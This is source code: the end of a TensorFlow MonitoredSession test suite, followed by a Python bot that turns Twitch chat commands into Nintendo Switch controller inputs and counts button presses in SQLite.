gstep = variables_lib.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
hook = RaiseOnceAtCountN(4, errors_impl.AbortedError(None, None, 'Abort'))
with monitored_session.MonitoredSession(hooks=[hook]) as session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# Here at step 3, the hook triggers and raises AbortedError. The
# MonitoredSession automatically retries and restart from a freshly
# initialized session, so the step is back to 0 and running do_step
# moves it to 1.
self.assertEqual(1, session.run(do_step))
self.assertFalse(session.should_stop())
self.assertTrue(hook.raised)
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
def test_recover_and_retry_on_aborted_error(self):
# Tests that we silently retry and recover on abort. This test uses
# a CheckpointSaver to have something to recover from.
logdir = _test_dir(self.get_temp_dir(),
'test_recover_and_retry_on_aborted_error')
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
scaffold = monitored_session.Scaffold()
abort_hook = RaiseOnceAtCountN(
4, errors_impl.AbortedError(None, None, 'Abort'))
# Save after each step.
ckpt_hook = basic_session_run_hooks.CheckpointSaverHook(
logdir, save_steps=1, scaffold=scaffold)
hooks = [abort_hook, ckpt_hook]
with monitored_session.MonitoredSession(
session_creator=monitored_session.ChiefSessionCreator(
scaffold, checkpoint_dir=logdir),
hooks=hooks) as session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# Here at step 3, the hook triggers and raises AbortedError. The
# MonitoredSession automatically restores and retries.
self.assertEqual(3, session.run(do_step))
self.assertTrue(abort_hook.raised)
self.assertFalse(session.should_stop())
self.assertEqual(4, session.run(do_step))
self.assertFalse(session.should_stop())
def test_exit_cleanly_on_out_of_range_exception(self):
# Tests that we stop cleanly when OutOfRange is raised.
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
hook = RaiseOnceAtCountN(2, errors_impl.OutOfRangeError(None, None,
'EOI'))
session = monitored_session.MonitoredSession(hooks=[hook])
# session should cleanly exit from the context.
with session:
self.assertEqual(0, session.run(gstep))
self.assertFalse(session.should_stop())
# Here at step 1, the hook triggers and raises OutOfRange. The
# session should go into should_stop() mode. It should raise the
# exception. So next step should not be executed.
session.run(do_step)
self.assertTrue(False)
self.assertTrue(session.should_stop())
def test_exit_cleanly_on_stop_iteration_exception(self):
# Tests that we stop cleanly when OutOfRange is raised.
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
hook = RaiseOnceAtCountN(2, StopIteration)
session = monitored_session.MonitoredSession(hooks=[hook])
# session should cleanly exit from the context.
with session:
self.assertEqual(0, session.run(gstep))
self.assertFalse(session.should_stop())
# Here at step 1, the hook triggers and raises StopIteration. The
# session should go into should_stop() mode. It should raise the
# exception. So next step should not be executed.
session.run(do_step)
self.assertTrue(False)
self.assertTrue(session.should_stop())
def test_regular_exception_pass_through_run(self):
# Tests that regular exceptions just pass through a "with
# MonitoredSession" block and set the session in stop mode.
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
hook = RaiseOnceAtCountN(4, RuntimeError('regular exception'))
session = monitored_session.MonitoredSession(hooks=[hook])
with self.assertRaisesRegexp(RuntimeError, 'regular exception'):
with session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# This triggers the hook and raises the exception
session.run(do_step)
# We should not hit this
self.assertFalse(True)
self.assertTrue(hook.raised)
self.assertTrue(session.should_stop())
def test_regular_exception_reported_to_coord_pass_through_run(self):
# Tests that regular exceptions reported to the coordinator from a thread
# passes through a "run()" call within a "with MonitoredSession" block and
# set the session in stop mode.
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
session = monitored_session.MonitoredSession()
run_performed_without_error = False
with self.assertRaisesRegexp(RuntimeError, 'a thread wants to stop'):
with session:
self.assertEqual(0, session.run(gstep))
# Report an exception through the coordinator.
try:
raise RuntimeError('a thread wants to stop')
except RuntimeError as e:
session._coordinated_creator.coord.request_stop(e)
# Call run() which should perform normally.
self.assertEqual(0, session.run(gstep))
run_performed_without_error = True
self.assertTrue(run_performed_without_error)
def test_regular_exception_reported_to_coord_pass_through_return(self):
# Tests that regular exceptions reported to the coordinator from a thread
# passes through returning from a "with MonitoredSession" block and
# set the session in stop mode.
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
session = monitored_session.MonitoredSession()
with self.assertRaisesRegexp(RuntimeError, 'a thread wants to stop'):
with session:
self.assertEqual(0, session.run(gstep))
# Report an exception through the coordinator.
try:
raise RuntimeError('a thread wants to stop')
except RuntimeError as e:
session._coordinated_creator.coord.request_stop(e)
self.assertTrue(session.should_stop())
# This set of tests, verifies the session behavior when exceptions are raised
# from code inside a "with MonitoredSession:" context.
def test_stop_cleanly_when_no_exception_in_with_body(self):
# Tests that regular exceptions pass through
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
session = monitored_session.MonitoredSession()
with session:
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# Should have closed.
self.assertTrue(session.should_stop())
self.assertTrue(session._is_closed())
def test_raises_regular_exceptions_in_with_body(self):
# Tests that regular exceptions in "with body" are seen outside.
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
session = monitored_session.MonitoredSession()
# We should see that exception.
with self.assertRaisesRegexp(RuntimeError, 'regular exception'):
with session:
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# Will be visible outside the "with body".
raise RuntimeError('regular exception')
# Should have closed.
self.assertTrue(session.should_stop())
self.assertTrue(session._is_closed())
def test_graph(self):
with ops.Graph().as_default() as g:
with monitored_session.MonitoredSession() as session:
self.assertEqual(g, session.graph)
def test_graph_finalized_during_run_unfinalized_after_exit(self):
with ops.Graph().as_default() as g:
a_var = variables.Variable(0)
with monitored_session.MonitoredSession() as session:
self.assertEqual(0, session.run(a_var))
self.assertTrue(g.finalized)
self.assertFalse(g.finalized)
def test_keep_finalized_graph_as_finalized(self):
with ops.Graph().as_default() as g:
a_var = variables.Variable(0)
monitored_session.Scaffold().finalize()
with monitored_session.MonitoredSession() as session:
self.assertEqual(0, session.run(a_var))
self.assertTrue(g.finalized)
self.assertTrue(g.finalized)
def test_merge_run_options_from_hooks(self):
"""Test for rewriting RunOptions and observing RunMetadata with hooks."""
with ops.Graph().as_default():
my_const = constant_op.constant(42, name='my_const')
_ = constant_op.constant(24, name='my_const_2')
watch_a = debug_pb2.DebugTensorWatch(
node_name='my_const',
output_slot=0,
debug_ops=['DebugIdentity'],
debug_urls=[])
hook_a = RunOptionsMetadataHook(2, 30000, False, watch_a)
watch_b = debug_pb2.DebugTensorWatch(
node_name='my_const_2',
output_slot=0,
debug_ops=['DebugIdentity'],
debug_urls=[])
hook_b = RunOptionsMetadataHook(3, 60000, True, watch_b)
with monitored_session.MonitoredSession(
hooks=[hook_a, hook_b]) as session:
self.assertEqual(42, session.run(my_const))
# trace_level=3 should have overridden trace_level=2;
# timeout_in_ms=60000 should have overridden 30000;
# output_partition_graphs=True should have overridden False.
# The two debug tensor watches should have been merged.
self.assertEqual(
[
config_pb2.RunOptions(
trace_level=3,
timeout_in_ms=60000,
output_partition_graphs=True,
debug_options=debug_pb2.DebugOptions(
debug_tensor_watch_opts=[watch_a, watch_b]))
],
hook_b.run_options_list)
self.assertEqual(1, len(hook_b.run_metadata_list))
self.assertTrue(
isinstance(hook_b.run_metadata_list[0], config_pb2.RunMetadata))
self.assertGreater(len(hook_b.run_metadata_list[0].partition_graphs), 0)
def test_merge_caller_and_hook_run_options(self):
"""Test that RunOptions from caller and hooks can be merged properly."""
with ops.Graph().as_default():
my_const = constant_op.constant(42, name='my_const')
_ = constant_op.constant(24, name='my_const_2')
hook_watch = debug_pb2.DebugTensorWatch(
node_name='my_const_2',
output_slot=0,
debug_ops=['DebugIdentity'],
debug_urls=[])
hook = RunOptionsMetadataHook(2, 60000, False, hook_watch)
with monitored_session.MonitoredSession(hooks=[hook]) as session:
caller_watch = debug_pb2.DebugTensorWatch(
node_name='my_const',
output_slot=0,
debug_ops=['DebugIdentity'],
debug_urls=[])
caller_options = config_pb2.RunOptions(
trace_level=3, timeout_in_ms=30000, output_partition_graphs=True)
caller_options.debug_options.debug_tensor_watch_opts.extend(
[caller_watch])
self.assertEqual(42, session.run(my_const, options=caller_options))
# trace_level=3 from the caller should override 2 from the hook.
# timeout_in_ms=60000 from the hook should override from the caller.
# output_partition_graph=True from the caller should override False
# from the hook.
# The two debug watches from the caller and the hook should be merged,
# in that order.
self.assertEqual(
[
config_pb2.RunOptions(
trace_level=3,
timeout_in_ms=60000,
output_partition_graphs=True,
debug_options=debug_pb2.DebugOptions(
debug_tensor_watch_opts=[caller_watch, hook_watch]))
],
hook.run_options_list)
self.assertEqual(1, len(hook.run_metadata_list))
self.assertTrue(
isinstance(hook.run_metadata_list[0], config_pb2.RunMetadata))
self.assertGreater(len(hook.run_metadata_list[0].partition_graphs), 0)
class SingularMonitoredSessionTest(test.TestCase):
"""Tests SingularMonitoredSession."""
def test_handles_initialization(self):
with ops.Graph().as_default():
a_var = variables.Variable(0)
with monitored_session.SingularMonitoredSession() as session:
# If it's not initialized, following statement raises an error.
self.assertEqual(0, session.run(a_var))
def test_do_not_handle_aborted_error(self):
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
class _RaiseAbortedHook(session_run_hook.SessionRunHook):
def before_run(self, run_context):
raise errors_impl.AbortedError(None, None, 'Abort')
with monitored_session.SingularMonitoredSession(
hooks=[_RaiseAbortedHook()]) as session:
with self.assertRaises(errors_impl.AbortedError):
self.assertEqual(0, session.run(gstep))
with self.assertRaises(errors_impl.AbortedError):
with monitored_session.SingularMonitoredSession(
hooks=[_RaiseAbortedHook()]) as session:
self.assertEqual(0, session.run(gstep))
def test_exit_cleanly_on_out_of_range_exception(self):
# Tests that we stop cleanly when OutOfRange is raised.
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
hook = RaiseOnceAtCountN(2, errors_impl.OutOfRangeError(None, None,
'EOI'))
session = monitored_session.SingularMonitoredSession(hooks=[hook])
# session should cleanly exit from the context.
with session:
self.assertEqual(0, session.run(gstep))
self.assertFalse(session.should_stop())
# Here at step 1, the hook triggers and raises OutOfRange. The
# session should go into should_stop() mode. It should raise the
# exception. So next step should not be executed.
session.run(do_step)
self.assertTrue(False)
self.assertTrue(session.should_stop())
def test_regular_exception_reported_to_coord_pass_through_run(self):
# Tests that regular exceptions reported to the coordinator from a thread
# passes through a "run()" call within a "with MonitoredSession" block and
# set the session in stop mode.
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
session = monitored_session.SingularMonitoredSession()
run_performed_without_error = False
with self.assertRaisesRegexp(RuntimeError, 'a thread wants to stop'):
with session:
self.assertEqual(0, session.run(gstep))
# Report an exception through the coordinator.
try:
raise RuntimeError('a thread wants to stop')
except RuntimeError as e:
session._coordinated_creator.coord.request_stop(e)
# Call run() which should perform normally.
self.assertEqual(0, session.run(gstep))
run_performed_without_error = True
self.assertTrue(run_performed_without_error)
def test_stop_cleanly_when_no_exception_in_with_body(self):
# Tests that regular exceptions pass through
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
session = monitored_session.SingularMonitoredSession()
with session:
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# Should have closed.
self.assertTrue(session.should_stop())
self.assertEqual(None, session.raw_session())
def test_graph(self):
with ops.Graph().as_default() as g:
with monitored_session.SingularMonitoredSession() as session:
self.assertEqual(g, session.graph)
def test_raw_session(self):
with ops.Graph().as_default():
with monitored_session.SingularMonitoredSession() as session:
self.assertTrue(isinstance(session.raw_session(), session_lib.Session))
if __name__ == '__main__':
test.main()
|
main.py
|
#!/usr/bin/python3
import re
import socket
import sqlite3
import asyncore
import os
from os.path import isfile
from json import load, dump
from time import sleep, time
from threading import Thread, Timer
#external libraries
from lib.switch_controller import *
TWITCH_HOST = "irc.chat.twitch.tv"
TWITCH_PORT = 6667
SERIAL_DEVICE = "COM5"
SERIAL_BAUD = 9600
MAX_COMMANDS_PER_MESSAGE = 8
CONFIG_FILE = "config.json"
DATABASE_FILE = "data.db"
#game mode
GAME_MODE = MODE_BACK_VIEW
#button shortcuts
JUMP_BUTTON = BUTTON_X
#last command timestamp
LAST_COMMAND = None
#keep-alive threshold in seconds
KEEP_ALIVE_DIFFERENTIAL = 60
#1 = username
#2 = command
#3 = channel
#4 = message
CHAT_EXP = re.compile(r"^:([\w\W]{0,}?)![\w\W]{0,}?@[\w\W]{0,}?\.tmi\.twitch\.tv\s([A-Z]{0,}?)\s#([\w\W]{0,}?)\s:([\w\W]{0,}?)$")
CURRENT_THREAD = None
def prevent_timeout():
Timer(KEEP_ALIVE_DIFFERENTIAL, keep_alive).start()
def keep_alive():
global LAST_COMMAND
global CURRENT_THREAD
#compute difference in current timestamp and last command
if isinstance(CURRENT_THREAD, Thread) and not CURRENT_THREAD.is_alive() and isinstance(LAST_COMMAND, int) and (timestamp() - LAST_COMMAND) >= KEEP_ALIVE_DIFFERENTIAL:
print('CommunityController used an awakening!')
controller.push_dpad(DPAD_LEFT)
prevent_timeout()
def timestamp():
return int(time.time())
def create_database() -> None:
"""
A, B, X, Y, L, R, ZL, ZR, up, down, left, right, left joystick, right joystick, select
"""
with sqlite3.connect(DATABASE_FILE) as db:
c = db.cursor()
c.execute("CREATE TABLE IF NOT EXISTS buttons (name TEXT PRIMARY KEY, presses INT)")
for button_name in [
"A", "B", "X", "Y", #ABXY
"L", "R", "ZL", "ZR", #bumpers and triggers
"LCLICK", "RCLICK", #L3 and R3
"UP", "DOWN", "LEFT", "RIGHT", #D-Pad
"LX MIN", "LX MAX", "LY MIN", "LY MAX", #left analog stick
"RX MIN", "RX MAX", "RY MIN", "RY MAX", #right analog stick
"START", "SELECT", #start and select
"CAPTURE" #capture button
]:
c.execute("INSERT INTO buttons (name, presses) VALUES ('" + button_name + "', 0)")
db.commit()
def increment_button_count(name: str) -> None:
with sqlite3.connect(DATABASE_FILE) as db:
c = db.cursor()
c.execute("SELECT * FROM buttons WHERE name=:name", {"name": name})
button = c.fetchone()
c.execute("UPDATE buttons SET presses=:presses WHERE name=:name", {"presses": button[1] + 1, "name": name})
db.commit()
def execute_command(message: str) -> None:
#db = sqlite3.connect("data.db")
message = message.strip().upper()
split_message = message.split(",")
command_executed = False
if len(split_message) <= MAX_COMMANDS_PER_MESSAGE:
for single in split_message:
single = single.strip().replace(" ", "_")
# A, B, X, and Y
if single in ["A", "B", "X", "Y"]:
increment_button_count(single)
if single == "A":
controller.push_button(BUTTON_A)
elif single == "B":
controller.push_button(BUTTON_B)
elif single == "X":
controller.push_button(BUTTON_X)
elif single == "Y":
controller.push_button(BUTTON_Y)
command_executed = True
# LB, LT, RB, and RT
elif single in ["L", "LB"]:
increment_button_count("L")
controller.push_button(BUTTON_L)
command_executed = True
elif single in ["R", "RB"]:
increment_button_count("R")
controller.push_button(BUTTON_R)
command_executed = True
elif single in ["LT", "ZL"]:
increment_button_count("ZL")
controller.push_button(BUTTON_ZL)
command_executed = True
elif single in ["RT", "ZR"]:
increment_button_count("ZR")
controller.push_button(BUTTON_ZR)
command_executed = True
#L3 and R3
elif single in ["LCLICK", "L3"]:
increment_button_count("LCLICK")
controller.push_button(BUTTON_LCLICK)
command_executed = True
elif single in ["RCLICK", "R3"]:
increment_button_count("RCLICK")
controller.push_button(BUTTON_RCLICK)
command_executed = True
# start and select
elif single in ["START", "SELECT", "PLUS", "+", "MINUS", "-"]:
if single in ["START", "PLUS", "+"]:
increment_button_count("START")
controller.push_button(BUTTON_PLUS)
if single in ["SELECT", "MINUS", "-"]:
increment_button_count("SELECT")
controller.push_button(BUTTON_MINUS)
command_executed = True
elif single in ["UP", "DOWN", "LEFT", "RIGHT"]: # D-Pad
if single == "UP":
increment_button_count("UP")
controller.push_dpad(DPAD_UP)
elif single == "DOWN":
increment_button_count("DOWN")
controller.push_dpad(DPAD_DOWN)
elif single == "LEFT":
increment_button_count("LEFT")
controller.push_dpad(DPAD_LEFT)
elif single == "RIGHT":
increment_button_count("RIGHT")
controller.push_dpad(DPAD_RIGHT)
command_executed = True
elif single in ["MOVE_FORWARD", "MOVE_BACK", "MOVE_LEFT", "MOVE_RIGHT"]: # left stick
if single == "MOVE_FORWARD":
increment_button_count("LY MIN")
controller.move_forward(GAME_MODE)
sleep(1.0)
controller.release_left_stick()
elif single == "MOVE_BACK":
increment_button_count("LY MAX")
controller.move_backward(GAME_MODE)
sleep(1.0)
controller.release_left_stick()
elif single == "MOVE_LEFT":
increment_button_count("LX MIN")
controller.move_left()
sleep(1.0)
controller.release_left_stick()
elif single == "MOVE_RIGHT":
increment_button_count("LX MAX")
controller.move_right()
sleep(1.0)
controller.release_left_stick()
command_executed = True
elif single in ["LOOK_UP", "LOOK_DOWN", "LOOK_LEFT", "LOOK_RIGHT"]: # right stick
if single == "LOOK_UP":
increment_button_count("RY MIN")
controller.look_up()
sleep(0.5)
controller.release_right_stick()
elif single == "LOOK_DOWN":
increment_button_count("RY MAX")
controller.look_down()
sleep(0.5)
controller.release_right_stick()
elif single == "LOOK_LEFT":
increment_button_count("RX MIN")
controller.look_left()
sleep(0.5)
controller.release_right_stick()
elif single == "LOOK_RIGHT":
increment_button_count("RX MAX")
controller.look_right()
sleep(0.5)
controller.release_right_stick()
command_executed = True
#commands for holding down each face button for 1 second
elif single in ["HOLD_A", "HOLD_B", "HOLD_X", "HOLD_Y"]:
if single == "HOLD_A":
increment_button_count("A")
controller.hold_buttons(BUTTON_A)
sleep(1.0)
controller.release_buttons(BUTTON_A)
elif single == "HOLD_B":
increment_button_count("B")
controller.hold_buttons(BUTTON_B)
sleep(1.0)
controller.release_buttons(BUTTON_B)
elif single == "HOLD_X":
increment_button_count("X")
controller.hold_buttons(BUTTON_X)
sleep(1.0)
controller.release_buttons(BUTTON_X)
elif single == "HOLD_Y":
increment_button_count("Y")
controller.hold_buttons(BUTTON_Y)
sleep(1.0)
controller.release_buttons(BUTTON_Y)
command_executed = True
elif single in ["HOLD_L", "HOLD_LB", "HOLD_R", "HOLD_RB", "HOLD_ZL", "HOLD_LT", "HOLD_ZR", "HOLD_RT", "HOLD_LCLICK", "HOLD_L3", "HOLD_RCLICK", "HOLD_R3"]:
if single in ["HOLD_L", "HOLD_LB"]:
increment_button_count("L")
controller.hold_buttons(BUTTON_L)
sleep(1.0)
controller.release_buttons(BUTTON_L)
elif single in ["HOLD_R", "HOLD_RB"]:
increment_button_count("R")
controller.hold_buttons(BUTTON_R)
sleep(1.0)
controller.release_buttons(BUTTON_R)
elif single in ["HOLD_ZL", "HOLD_LT"]:
increment_button_count("ZL")
controller.hold_buttons(BUTTON_ZL)
sleep(1.0)
controller.release_buttons(BUTTON_ZL)
elif single in ["HOLD_ZR", "HOLD_RT"]:
increment_button_count("ZR")
controller.hold_buttons(BUTTON_ZR)
sleep(1.0)
controller.release_buttons(BUTTON_ZR)
elif single in ["HOLD_LCLICK", "HOLD_L3"]:
increment_button_count("LCLICK")
controller.hold_buttons(BUTTON_LCLICK)
sleep(1.0)
controller.release_buttons(BUTTON_LCLICK)
elif single in ["HOLD_RCLICK", "HOLD_R3"]:
increment_button_count("RCLICK")
controller.hold_buttons(BUTTON_RCLICK)
sleep(1.0)
controller.release_buttons(BUTTON_RCLICK)
command_executed = True
elif single in ["HOLD_UP", "HOLD_DOWN", "HOLD_LEFT", "HOLD_RIGHT"]:
if single == "HOLD_UP":
increment_button_count("UP")
controller.hold_dpad(DPAD_UP)
sleep(1.0)
controller.release_dpad()
elif single == "HOLD_DOWN":
increment_button_count("DOWN")
controller.hold_dpad(DPAD_DOWN)
sleep(1.0)
controller.release_dpad()
elif single == "HOLD_LEFT":
increment_button_count("LEFT")
controller.hold_dpad(DPAD_LEFT)
sleep(1.0)
controller.release_dpad()
elif single == "HOLD_RIGHT":
increment_button_count("RIGHT")
controller.hold_dpad(DPAD_RIGHT)
sleep(1.0)
controller.release_dpad()
command_executed = True
elif single in ["PRESS_UP", "PRESS_DOWN", "PRESS_LEFT", "PRESS_RIGHT"]:
if single == "PRESS_UP":
increment_button_count("UP")
controller.hold_dpad(DPAD_UP)
sleep(0.5)
controller.release_dpad()
elif single == "PRESS_DOWN":
increment_button_count("DOWN")
controller.hold_dpad(DPAD_DOWN)
sleep(0.5)
controller.release_dpad()
elif single == "PRESS_LEFT":
increment_button_count("LEFT")
controller.hold_dpad(DPAD_LEFT)
sleep(0.5)
controller.release_dpad()
elif single == "PRESS_RIGHT":
increment_button_count("RIGHT")
controller.hold_dpad(DPAD_RIGHT)
sleep(0.5)
controller.release_dpad()
command_executed = True
elif single in ["ADJUST_BACKWARD", "ADJUST_BACK", "ADJUST_FORWARD", "ADJUST_LEFT", "ADJUST_RIGHT"]:
if single == "ADJUST_BACKWARD":
increment_button_count("LY MAX")
controller.move_backward(GAME_MODE)
sleep(0.3)
controller.release_left_stick()
elif single == "ADJUST_BACK":
increment_button_count("LY MAX")
controller.move_backward(GAME_MODE)
sleep(0.3)
controller.release_left_stick()
elif single == "ADJUST_FORWARD":
increment_button_count("LY MIN")
controller.move_forward(GAME_MODE)
sleep(0.3)
controller.release_left_stick()
elif single == "ADJUST_LEFT":
increment_button_count("LX MIN")
controller.move_left()
sleep(0.3)
controller.release_left_stick()
elif single == "ADJUST_RIGHT":
increment_button_count("LX MAX")
controller.move_right()
sleep(0.3)
controller.release_left_stick()
command_executed = True
elif single in ["GLANCE_UP", "GLANCE_DOWN", "GLANCE_LEFT", "GLANCE_RIGHT"]:
if single == "GLANCE_UP":
increment_button_count("RY MIN")
controller.look_up()
sleep(0.125)
controller.release_right_stick()
elif single == "GLANCE_DOWN":
increment_button_count("RY MAX")
controller.look_down()
sleep(0.125)
controller.release_right_stick()
elif single == "GLANCE_LEFT":
increment_button_count("RX MIN")
controller.look_left()
sleep(0.125)
controller.release_right_stick()
elif single == "GLANCE_RIGHT":
increment_button_count("RX MAX")
controller.look_right()
sleep(0.125)
controller.release_right_stick()
command_executed = True
#hold until manual release
elif single in ["KEEP_HOLD_A", "KEEP_HOLD_B", "KEEP_HOLD_X", "KEEP_HOLD_Y"]:
if single == "KEEP_HOLD_A":
increment_button_count("A")
controller.hold_buttons(BUTTON_A)
elif single == "KEEP_HOLD_B":
increment_button_count("B")
controller.hold_buttons(BUTTON_B)
elif single == "KEEP_HOLD_X":
increment_button_count("X")
controller.hold_buttons(BUTTON_X)
elif single == "KEEP_HOLD_Y":
increment_button_count("Y")
controller.hold_buttons(BUTTON_Y)
command_executed = True
elif single in ["RELEASE_A", "RELEASE_B", "RELEASE_X", "RELEASE_Y"]:
if single == "RELEASE_A":
controller.release_buttons(BUTTON_A)
elif single == "RELEASE_B":
controller.release_buttons(BUTTON_B)
elif single == "RELEASE_X":
controller.release_buttons(BUTTON_X)
elif single == "RELEASE_Y":
controller.release_buttons(BUTTON_Y)
command_executed = True
elif single in ["KEEP_HOLD_L", "KEEP_HOLD_LB", "KEEP_HOLD_R", "KEEP_HOLD_RB", "KEEP_HOLD_ZL", "KEEP_HOLD_LT", "KEEP_HOLD_ZR", "KEEP_HOLD_RT"]:
if single in ["KEEP_HOLD_L", "KEEP_HOLD_LB"]:
increment_button_count("L")
controller.hold_buttons(BUTTON_L)
elif single in ["KEEP_HOLD_R", "KEEP_HOLD_RB"]:
increment_button_count("R")
controller.hold_buttons(BUTTON_R)
elif single in ["KEEP_HOLD_ZL", "KEEP_HOLD_LT"]:
increment_button_count("ZL")
controller.hold_buttons(BUTTON_ZL)
elif single in ["KEEP_HOLD_ZR", "KEEP_HOLD_RT"]:
increment_button_count("ZR")
controller.hold_buttons(BUTTON_ZR)
command_executed = True
elif single in ["RELEASE_L", "RELEASE_LB", "RELEASE_R", "RELEASE_RB", "RELEASE_ZL", "RELEASE_LT", "RELEASE_ZR", "RELEASE_RT"]:
if single in ["RELEASE_L", "RELEASE_LB"]:
controller.release_buttons(BUTTON_L)
elif single in ["RELEASE_R", "RELEASE_RB"]:
controller.release_buttons(BUTTON_R)
elif single in ["RELEASE_ZL", "RELEASE_LT"]:
controller.release_buttons(BUTTON_ZL)
elif single in ["RELEASE_ZR", "RELEASE_RT"]:
controller.release_buttons(BUTTON_ZR)
command_executed = True
elif single in ["KEEP_HOLD_UP", "KEEP_HOLD_DOWN", "KEEP_HOLD_LEFT", "KEEP_HOLD_RIGHT"]:
if single == "KEEP_HOLD_UP":
increment_button_count("UP")
controller.hold_dpad(DPAD_UP)
elif single == "KEEP_HOLD_DOWN":
increment_button_count("DOWN")
controller.hold_dpad(DPAD_DOWN)
elif single == "KEEP_HOLD_LEFT":
increment_button_count("LEFT")
controller.hold_dpad(DPAD_LEFT)
elif single == "KEEP_HOLD_RIGHT":
increment_button_count("RIGHT")
controller.hold_dpad(DPAD_RIGHT)
command_executed = True
elif single in ["RELEASE_DPAD", "RELEASE_UP", "RELEASE_DOWN", "RELEASE_LEFT", "RELEASE_RIGHT"]:
controller.release_dpad()
command_executed = True
#game sensitive
elif single in ["JUMP_FORWARD", "JUMP_UP", "JUMP", "JUMP_BACK", "JUMP_DOWN", "JUMP_LEFT", "JUMP_RIGHT"]:
if single == "JUMP_FORWARD":
increment_button_count("LY MIN")
controller.move_forward(GAME_MODE)
sleep(0.05)
controller.hold_buttons(JUMP_BUTTON)
sleep(0.95)
controller.release_buttons(JUMP_BUTTON)
controller.release_left_stick()
elif single == "JUMP_UP":
increment_button_count("LY MIN")
controller.move_forward(GAME_MODE)
sleep(0.05)
controller.hold_buttons(JUMP_BUTTON)
sleep(0.95)
controller.release_buttons(JUMP_BUTTON)
controller.release_left_stick()
elif single == "JUMP":
increment_button_count("LY MIN")
controller.move_forward(GAME_MODE)
sleep(0.05)
controller.hold_buttons(JUMP_BUTTON)
sleep(0.95)
controller.release_buttons(JUMP_BUTTON)
controller.release_left_stick()
elif single == "JUMP_BACK":
increment_button_count("LY MAX")
controller.move_backward(GAME_MODE)
sleep(0.05)
controller.hold_buttons(JUMP_BUTTON)
sleep(0.95)
controller.release_buttons(JUMP_BUTTON)
controller.release_left_stick()
elif single == "JUMP_DOWN":
increment_button_count("LY MAX")
controller.move_backward(GAME_MODE)
sleep(0.05)
controller.hold_buttons(JUMP_BUTTON)
sleep(0.95)
controller.release_buttons(JUMP_BUTTON)
controller.release_left_stick()
elif single == "JUMP_LEFT":
increment_button_count("LX MIN")
controller.move_left()
sleep(0.05)
controller.hold_buttons(JUMP_BUTTON)
sleep(0.95)
controller.release_buttons(JUMP_BUTTON)
controller.release_left_stick()
elif single == "JUMP_RIGHT":
increment_button_count("LX MAX")
controller.move_right()
sleep(0.05)
controller.hold_buttons(JUMP_BUTTON)
sleep(0.95)
controller.release_buttons(JUMP_BUTTON)
controller.release_left_stick()
command_executed = True
elif single in ["HOP", "HOP_FORWARD", "HOP_UP", "HOP_BACKWARD", "HOP_BACK", "HOP_DOWN", "HOP_LEFT", "HOP_RIGHT"]:
if single == "HOP":
sleep(0.05)
controller.push_button(JUMP_BUTTON)
sleep(0.15)
elif single == "HOP_FORWARD":
increment_button_count("LY MIN")
controller.move_forward(GAME_MODE)
sleep(0.05)
controller.push_button(JUMP_BUTTON)
sleep(0.15)
controller.release_left_stick()
elif single in ["HOP_BACKWARD", "HOP_BACK"]:
increment_button_count("LY MAX")
controller.move_backward(GAME_MODE)
sleep(0.05)
controller.push_button(JUMP_BUTTON)
sleep(0.15)
controller.release_left_stick()
elif single == "HOP_UP":
increment_button_count("LY MIN")
controller.move_forward(GAME_MODE)
sleep(0.05)
controller.push_button(JUMP_BUTTON)
sleep(0.15)
controller.release_left_stick()
elif single == "HOP_DOWN":
increment_button_count("LY MAX")
controller.move_backward(GAME_MODE)
sleep(0.05)
controller.push_button(JUMP_BUTTON)
sleep(0.15)
controller.release_left_stick()
elif single == "HOP_LEFT":
increment_button_count("LX MIN")
controller.move_left()
sleep(0.05)
controller.push_button(JUMP_BUTTON)
sleep(0.15)
controller.release_left_stick()
elif single == "HOP_RIGHT":
increment_button_count("LX MAX")
controller.move_right()
sleep(0.05)
controller.push_button(JUMP_BUTTON)
sleep(0.15)
controller.release_left_stick()
command_executed = True
#game specific commands
elif single == "CROUCH":
increment_button_count("LCLICK")
controller.push_button(BUTTON_LCLICK)
command_executed = True
elif single == "STAND":
increment_button_count("LCLICK")
controller.push_button(BUTTON_LCLICK)
command_executed = True
elif single == "BLOCK":
increment_button_count("ZL")
controller.hold_buttons(BUTTON_ZL)
sleep(1.0)
controller.release_buttons(BUTTON_ZL)
command_executed = True
elif single == "SHIELD":
increment_button_count("ZL")
controller.hold_buttons(BUTTON_ZL)
sleep(1.0)
controller.hold_buttons(BUTTON_ZL)
command_executed = True
elif single == "RUNE":
increment_button_count("L")
controller.hold_buttons(BUTTON_L)
sleep(1.0)
controller.release_buttons(BUTTON_L)
command_executed = True
elif single == "USE_RUNE":
increment_button_count("L")
controller.hold_buttons(BUTTON_L)
sleep(1.0)
controller.release_buttons(BUTTON_L)
command_executed = True
elif single == "DRAW_ARROW":
increment_button_count("ZR")
